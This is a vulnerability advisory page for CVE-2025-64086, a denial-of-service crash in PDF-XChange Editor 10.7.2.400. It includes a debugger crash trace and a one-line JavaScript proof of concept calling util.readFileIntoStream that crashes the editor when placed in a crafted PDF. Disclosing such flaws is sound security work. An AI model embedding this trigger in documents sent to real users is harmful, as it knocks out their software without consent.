Skip to main content
JeroScope
EN

PDF-XChange Editor readFileIntoStream() Deinal of Service Vulnerability

← Back to Advisories
CVE Number CVE-2025-64086
Vendor PDF-XChange
Credit Lee Kwang Hui

Description

In PDF-XChange Editor 10.7.2.400, an Access Violation occurs when the `util.readFileIntoStream` method is invoked. If a user opens a maliciously crafted PDF file, the application terminates immediately, resulting in a Denial-of-Service condition.

Details

The instruction at which the vulnerability occurs is as follows:

(5e78.60c8): Access violation - code c0000005 (!!! second chance !!!)
PDFXEditCore_x64!PXV_GetInstance+0x7252e1:
00007fff`bfb855e1 488b08          mov     rcx,qword ptr [rax] ds:00000000`00000000=????????????????

When the util.readFileIntoStream invocation fails to create a file stream object, the object is not properly initialized and remains in a zeroed state. The use of this uninitialized object leads to a null pointer dereference.

The PoC is as follows.

util.readFileIntoStream([], 65535)

Timeline

2025-10-19 - Vulnerability reported to Vendor

- Vendor Patch Release